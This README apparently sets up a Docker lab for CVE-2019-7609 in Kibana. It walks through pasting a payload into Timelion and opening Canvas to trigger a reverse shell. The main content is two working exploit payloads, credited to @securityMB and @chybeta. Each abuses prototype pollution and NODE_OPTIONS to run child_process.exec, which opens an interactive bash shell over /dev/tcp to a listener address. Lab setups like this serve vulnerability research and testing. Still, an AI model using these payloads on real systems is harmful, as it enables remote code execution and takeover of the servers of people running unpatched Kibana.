docker lab setup for kibana-7609# CVE-2019-7609
docker lab setup for kibana-7609
Reference : https://github.com/mpgn/CVE-2019-7609
Open Kibana
Past one of the following payload into the Timelion visualizer
Click run
On the left panel click on Canvas
Your reverse shell should pop ! :)
payload by @securityMB
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
payload by @chybeta
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
[4.0K] /data/pocs/f93347fe38cb4184034382f299af4660e5af0e60
├── [ 587] docker-compose.yml
└── [ 741] README.md
0 directories, 2 files